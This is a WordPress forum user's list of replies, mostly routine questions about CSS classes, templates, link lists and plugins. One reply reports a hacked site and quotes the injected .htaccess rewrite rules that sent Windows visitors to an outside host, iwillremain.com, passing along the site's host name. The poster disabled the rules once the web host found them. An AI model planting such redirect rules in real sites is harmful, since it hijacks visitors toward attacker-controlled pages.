garybeck
Forum Replies Created
-
Forum: Fixing WordPress
In reply to: “Server Not Found” errorMy webhost tech help found the problem!
evidently my website was hacked.
there is a file named “htaccess” in my home directory. It defines redirects, error pages, and other stuff.
there were some lines in it creating redirects to ns1.iwillremain.com, such as:
RewriteCond %{HTTP_USER_AGENT} .*Windows.*
RewriteRule .* https://ns1.iwillremain.com/main.php?h=%{HTTP_HOST}&i=Jc2tidcaov2igRj7U8NFyZsXog==&e=r [R,L]I have no idea how it got there. My webhost thinks my site was hacked.
I changed the line that said:
RewriteEngine On
to
RewriteEngine Off
and now my site is working again.
I wish I knew how this could happen. But at least it’s working again.
Forum: Fixing WordPress
In reply to: “Server Not Found” errorI hate to kick my own thread but I’m wondering if anyone has any idea what is going on here… and I noticed something else significant.
when I click on the “update file” link and I get the error, it appears it is trying to go to:
/main.php?h=anneobrien.org&i=tidcaov2igRj7U8NFyZXog==&e=r
and for some very strange reason, the home directory is being defined as nsi.iwillremain.com
so the explicit URL it’s trying to access is:
nsi.iwillremain.com/main.php?h=anneobrien.org&i=tidcaov2igRj7U8NFyZXog==&e=r
now I have no idea what iwillremain.com is, but it should have nothing to do with my blog. I looked it up and and it’s just parked on godaddy.com, and not in use.
I did a text search on the backend of my entire blog and “iwillremain.com” is nowhere at all.
why in the world is “iwillremain.com” getting inserted as the home directory of my blog? since this text doesn’t exist on my blog, it seems to me it must be being inserted (or the home directory is being defined) by the server. But my webhost denies the server is the trouble.
please help!?!?!?
Forum: Fixing WordPress
In reply to: HAAALP! Can’t edit my theme!also I just tried it on firefox and got
“the connection was reset
the connection to the server was reset while the page was loading
the site could be temporarily unavailable or too busy.
blah blah…”Forum: Fixing WordPress
In reply to: HAAALP! Can’t edit my theme!in my haste I had a typo…
I checked the CHMOD of the sidebar.php file that I’m trying to **edit and** set it to 666
Forum: Fixing WordPress
In reply to: Where is "class='xoxo blogroll'" coming from??thanks everyone. I’m still not sure why my css code didn’t work and yours did, but at this point it doesn’t matter ??
thanks very much
Forum: Fixing WordPress
In reply to: Where is "class='xoxo blogroll'" coming from??thanks but I’m confused. if the class assigned is ‘xoxo blogroll’ don’t i have to include the ‘xoxo’ in the stylesheet definition?
i’ve never seen spaces in class names.
Forum: Fixing WordPress
In reply to: Would appreciate help on wp_list_bookmarks formattinghey the display on this post is messed up. is there no “preview” or “edit” functionality on this forum?
Forum: Fixing WordPress
In reply to: How do I get my links to show?henkholland, you rock! you opened my eyes to something I didn’t know about wordpress. thanks. I created a new template and got the links list to show.
many thanks~~!!
Forum: Fixing WordPress
In reply to: How do I get my links to show?if this is an issue, my wordpress version is 2.8.6
thanks
Forum: Plugins
In reply to: Can you suggest a simple events calendar for me?vtxyzzy, thanks very much! now that I see the standalone page I will go for it!
many thanks!
Forum: Fixing WordPress
In reply to: Starting an embedded youtube video at a specific point ?thank you for the reply. it is working now. I didn’t change anytyhing. it must have been a blip in the space-time continuum last night. I will upgrade regardless.
Forum: Plugins
In reply to: Dropdown menu showing child pages???update, I found this in the code:
<?php wp_list_pages(‘title_li=&depth=1’); ?>
which I changed to
<?php wp_list_pages(‘title_li=&depth=2’); ?>
but this didn’t resolve it… for some reason now it’s only showing the one “tree” that has a child on it, and the others have disappeared.
?? ??
Forum: Fixing WordPress
In reply to: controlling order of pages??thanks very much that seems to be the ticket!